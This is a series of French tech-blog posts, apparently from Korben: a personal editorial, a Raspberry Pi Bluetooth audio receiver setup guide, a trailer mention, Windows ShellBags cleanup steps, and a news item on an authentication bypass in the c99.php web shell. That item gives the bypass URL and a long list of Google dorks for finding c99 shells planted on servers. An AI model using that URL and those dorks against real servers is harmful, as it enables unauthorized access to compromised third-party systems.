Salut les amis,

Je viens de passer une semaine de détente totale en camping dans l'Ardèche et ça m'a plutôt fait du bien. Je ne vous dirai pas que je me suis reposé, mais j'ai pas mal décroché des Internet. Du coup, j'ai loupé plein de trucs et j'ai pas mal de retard à rattraper.

Cela ne risque d'ailleurs pas de s'arranger avec mon déménagement qui approche. Faut d'ailleurs que je pense à ouvrir une ligne ADSL rapidement. Oui, adieu ma fibre, car dans la ville où je m'installe, en ce moment, Orange fibre surtout les champs et pas le reste du patelin. Breeeeef...

Je vais enfin avoir un petit jardin et ça, c'est un truc de fou, car je vais découvrir les joies de la tonte et du taillage de haies. Joie ! J'ai aussi de folles envies de récupérateur d'eau, de permaculture et de composteur... On verra si je trouve le temps.

J'ai hâte d'y être en tout cas.

Et vous, comment ça se passe ce début d'été ? Des vacances de prévues ?

Tchuss

Ps: Et pour ceux qui l'ont réclamé à cor et à cri, je me suis enfin mis au Bitcoin.

Cet article merveilleux et sans aucun égal intitulé : Edito du 25/06/2014 ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Si vous avez un vieil autoradio dans votre voiture ou une vieille chaine Hifi disposant d'une entrée auxiliaire, 2 solutions s'offrent à vous pour pouvoir y balancer de la musique en Bluetooth via votre téléphone ou votre ordinateur.

La première est très simple et s'adresse aux paresseux : Acheter un transmetteur Bluetooth comme celui-ci ou celui-là.

La seconde est beaucoup plus cool puisqu'elle permet tout simplement d'utiliser un Raspberry Pi pour en faire un récepteur audio Bluetooth.

Voici les explications de Parkerireed qui partage son montage avec les gens de l'Internet

I had always wanted to do something like this but never quite connected all the pieces. You need pulseaudio and bluez from your favorite package manager.

I did this in Arch linux but at least udev and maybe the bluetooth up service file should apply to more distros.

First, I created /etc/udev/rules.d/10-local.rules with the contents

# Set Bluetooth power up
ACTION=="add", KERNEL=="hci0", RUN+="/usr/bin/hciconfig hci0 up"

Second, I created a systemd target file for bringing the hci0 interface up right after the bluetooth daemon starts. The file is /lib/systemd/system/bluepower.target and contains

[Unit]
Description=Bluetooth power keeper
Requires=sys-subsystem-bluetooth-devices-%i.device bluetooth.service
PartOf=sys-subsystem-bluetooth-devices-%i.device
After=bluetooth.service sys-subsystem-bluetooth-devices-%i.device suspend.target
Conflicts=shutdown.target systemd-sleep.service

[Service]
Type=oneshot
RemainAfterExit=yes
ExecStart=/usr/bin/dbus-send --system --type=method_call --dest=org.bluez /org/bluez/%I org.freedesktop.DBus.Properties.Set string:org.bluez.Adapter1 string:Powered variant:boolean:true
ExecStop=/usr/bin/dbus-send --system --type=method_call --dest=org.bluez /org/bluez/%I org.freedesktop.DBus.Properties.Set string:org.bluez.Adapter1 string:Powered variant:boolean:false

[Install]
WantedBy=bluetooth.target

Then I ran

sudo systemctl enable bluepower.target

Next, I enabled auto login to my user on the first tty1 by editing the file

/etc/systemd/system/getty@tty1.service.d/autologin.conf

(You might have to create the getty@tty1.service.d folder) with the contents

[Service]
ExecStart=
ExecStart=-/usr/bin/agetty --autologin username --noclear %I 38400 linux

Then at the end of my ~/.bashrc I added

pulseaudio -D

Finally comes the first time connect. Run

bluetoothctl (This is bluez5. If you are using an older bluez refer to the documentation to connect to your phone/audio device)
power on
agent on
scan on

Put device is discovery mode. It will show the device in the output.

pair macaddress

Follow pairing instructions.

trust macaddress
connect macaddress

If all goes well you should have audio being played from the phone/media player to the Raspberry Pi and everything auto launching at boot.

Sources:

[1] https://bbs.archlinux.org/viewtopic.php?id=166362

[2] https://wiki.archlinux.org/index.php/automatic_login_to_virtual_console

Amusez-vous bien !

Source

Cet article merveilleux et sans aucun égal intitulé : Transformer un Raspberry Pi en récepteur audio Bluetooth ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Ceux d'entre vous qui s’intéressent un peu à la sécurité connaissent sans doute le script c99.php qui se place en douce sur un serveur web et qui permet d'avoir accès à un shell sur le serveur.

C'est très utilisé par les hackers (blackhat) mais aussi par certaines personnes qui détournent son usage pour avoir un accès shell distant sur leurs propres machines. Et une autre personne ne peut à priori pas y avoir accès puisqu'il est possible de bloquer l'accès via un login et mot de passe...

Seulement, voilà... Le chercheur en sécurité Matthew Bryant a analysé ce script et s'est rendu compte qu'il comportait une vulnérabilité dans la commande extract() qui permet à n'importe qui de contourner l'authentification.

En gros, si vous tombez sur un c99.php qui vous demande un mot de passe, vous pouvez quand même y accéder simplement via cette URL :

http://127.0.0.1/c99.php?c99shcook[login]=0

(En remplaçant 127.0.0.1 par le domaine qui va bien)

Marrant non ? Ça promet encore des heures de rigolades dans lindèrgrunde. En attendant, si vous utilisez ce script pour vos besoins d'admin, je vous recommande de le supprimer rapidement.

Ah et pour détecter la présence d'un c99.php en passant par Google, voici quelques dorks :

• safe-mode: off (not secure) drwxrwxrwx c99shell
• inurl:c99.php
• inurl:c99.php uid=0(root)
• root c99.php
• "Captain Crunch Security Team" inurl:c99
• inurl:c99.php
• allinurl: c99.php
• inurl:c99.php
• inurl:"c99.php" c99shell
• inurl:c99.php uid=0(root)
• c99shell powered by admin
• c99shell powered by admin
• inurl:"/c99.php"
• inurl:c99.php
• c99 shell v.1.0 (roots)
• inurl:c99.php
• allintitle: "c99shell"
• inurl:"c99.php
• allinurl: "c99.php"
• inurl:c99.php
• intitle:C99Shell v. 1.0 pre-release +uname
• allinurl: "c99.php"
• inurl:c99.php
• inurl:"c99.php" c99shell
• inurl:"/c99.php
• inurl:/c99.php+uname
• allinurl:"c99.php"
• inurl:"c99.php"
• allinurl:c99.php
• "inurl:c99..php"
• c99shell [file on secure ok ]?
• powered by Captain Crunch Security Team
• allinurl:c99.php
• "c99.php" filetype:php
• allinurl:c99.php
• inurl:c99.php
• allinurl:.c99.php
• "inurl:c99.php"
• c99. PHP-code Feedback Self remove
• allinurl:c99.php
• download c99.php
• allinurl:c99.php
• inurl:c99.php
• allinurl: "c99.php"
• intitle:C99Shell v. 1.0 pre-release +uname
• allinurl:"c99.php"
• inurl:c99.php
• safe-mode: off (not secure) drwxrwxrwx c99shell
• c99.php download
• inurl:c99.php
• c99shell filetype:php -echo
• inurl:"c99.php"
• inurl:c99.php uid=0(root)
• allinurl:c99.php
• inurl:"/c99.php" intitle:"C99shell"
• C99Shell v. 1.0 pre-release build #5
• --[ c99shell v. 1.0 pre-release build #16
• c99shell linux infong
• C99Shell v. 1.0 pre-release build
• !C99Shell v. 1.0 beta!
• Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
• !c99shell v. 1+Safe-mode: OFF (not secure)
• "C99Shell v. 1.0 pre-release build "
• intitle:c99shell +filetype:php
• inurl:c99.php
• intitle:C99Shell v. 1.0 pre-release +uname
• intitle:!C99Shell v. 1.0 pre-release build #16! root
• !C99Shell v. 1.0 pre-release build #5!
• inurl:"c99.php"
• C99Shell v. 1.0 pre-release build #16!
• intitle:c99shell intext:uname
• allintext:C99Shell v. 1.0 pre-release build #12
• c99shell v. 1.0 pre-release build #16
• --[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
• allinurl: "c99.php"
• Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
• "c99shell v 1.0"
• ftp apache inurl:c99.php
• c99shell+v.+1.0 16
• C99Shell v. 1.0 pre-release build #16 download
• intitle:c99shell "Software: Apache"
• allinurl: c99.php
• allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
• intitle:c99shell uname -bbpress
• intitle:"index.of" c99.php
• inurl:admin/files/
• intitle:"index of /" "c99.php"
• intitle:"index of" intext:c99.php
• intitle:index.of c99.php
• intitle:"index of" + c99.php
• intitle:index/of file c99.php
• intitle:index/of file c99.php
• index of /admin/files/
• intitle:"Index of/"+c99.php
• c99.php "intitle:Index of "
• intitle:index.of c99.php
• img/c99.php
• intitle:index.of c99.php
• img.c99.php
• intitle:"Index of/"+c99.php
• "index of /" c99.php
• c99.php
• intitle:"Index of" c99.php
• "index of" c99.php
• "Index of/"+c99.php

Source + source

Cet article merveilleux et sans aucun égal intitulé : Un backdoor dans le script c99Shell ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

J'attends ce film avec beaucoup d'impatience, surtout maintenant que j'ai vu cette nouvelle bande-annonce...

Un message de paix et d'espoir qu'il faut transposer à nos conflits endogène. Les gens ne mangent pas assez de bananes, l'espèce humaine doit remédier à cela !

Source

Cet article merveilleux et sans aucun égal intitulé : La planète des singes – L’Affrontement ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Saviez vous qu'en jetant simplement un oeil dans votre base de registre Windows, n'importe qui peut y trouver la liste des dossiers et des fichiers récemment accédés ?

Ces éléments sont les ShellBags et ils sont utiles au système puisque c'est ce qui permet d'enregistrer les paramètres d'affichage dossier par dossier. Mais c'est aussi un élément qui peut "trahir" vos activités sur votre PC. En effet, ces "shellbags" sont conservés avec la date de création et la date d'accès aux dossiers et cela même si le dossier a été supprimé.

Alors que faire ? Et bien il y a la méthode manuelle qui consiste à se rendre dans la base de registres puis à supprimer les clés suivantes :

• HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Bags
• HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\BagMRU
• HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags
• HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU
• HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
• HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags

Et pour les Windows 64-bit, supprimez aussi :

• HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Local Settings\Software\Microsoft\Windows\Shell\Bags
• HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Local Settings\Software\Microsoft\Windows\Shell\BagMRU

Puis à recréer manuellement les clés suivantes :

• HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
• HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags

Et pour les Windows 64-bit, créez aussi les clés :

• HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Local Settings\Software\Microsoft\Windows\Shell\Bags
• HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Local Settings\Software\Microsoft\Windows\Shell\BagMRU

Voilà, le ménage sera fait comme ça.

Mais si toucher à votre base de registre vous fait peur, sachez qu'il existe un excellent petit soft baptisé "Shellbag Analyzer & Cleaner" qui va vous permettre de faire le ménage plus finement et de manière plus visuelle.

Et pour ceux qui ne jurent que par la ligne de commande, je vous renvoie vers cet outil pour la console qui permet de faire la même chose.

Source

Cet article merveilleux et sans aucun égal intitulé : Supprimez les shellbags sous Windows pour plus de confidentialité ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.